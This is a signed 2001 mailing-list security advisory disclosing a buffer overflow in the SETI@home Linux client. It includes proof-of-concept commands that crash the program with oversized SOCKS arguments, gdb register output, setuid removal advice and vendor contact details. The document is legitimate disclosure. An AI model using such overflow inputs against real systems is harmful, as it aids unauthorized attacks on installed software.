-----BEGIN PGP SIGNED MESSAGE----- Vulnerability in SETI@home Overview SETI@home (http://setiathome.berkeley.edu/) is a distributed project that allows ordinary citizens participate in the search for extraterrestrial intelligence using their computer's idle time. A buffer overflow exists in the UNIX client software. NOTE: this vulnerability is NOT exploitable in the default installation. Details The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and possibly others) is vulnerable to buffer overflow. Example: # ./setiathome -version SETI@home client. Platform: i386-pc-linux-gnu-gnulibc2.1 Version: 3.03 ... ... # ./setiathome -socks_server `perl -e 'print "A" x 5604;'` Segmentation fault # ./setiathome -socks_user `perl -e 'print "A" x 5344;'` Segmentation fault # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'` Segmentation fault # [root@seti /home/setiathome]# gdb setiathome GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... (gdb) r -socks_server `perl -e 'print "A" x 5604;'` Starting program: /home/setiathome/setiathome -socks_server `perl -e 'print "A" x 5604;'` Program received signal SIGSEGV, Segmentation fault. 0x2ab4d409 in strcpy () from /lib/libc.so.6 (gdb) info registers eax 0x0 0 ecx 0x40404040 1077952576 edx 0x41414141 1094795585 ebx 0xfefefeff -16843009 esp 0x7fffe664 0x7fffe664 ebp 0x7fffe6bc 0x7fffe6bc esi 0x7ffffe28 2147483176 edi 0x807bffd 134725629 eip 0x2ab4d409 0x2ab4d409 eflags 0x10246 66118 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 fctrl 0x37f 895 fstat 0x0 0 ftag 0xffff 65535 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 Solution The SETI@home UNIX client is not installed with a setuid bit by default. If one was added to it -- perhaps to run it under a 'setiathome' account -- remove it immediately. Vendor Status The project directory, Dr. Dave P. Anderson, was contacted via <daveaat_private> on Monday, Nov 5th. He promptly replied that this problem will be fixed in the next release. - Joe Testa e-mail: joetestaat_private web page: http://hogs.rit.edu/~joet/ AIM: LordSpankatron -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ= =M4UW -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Sun Dec 02 2001 - 16:31:41 PST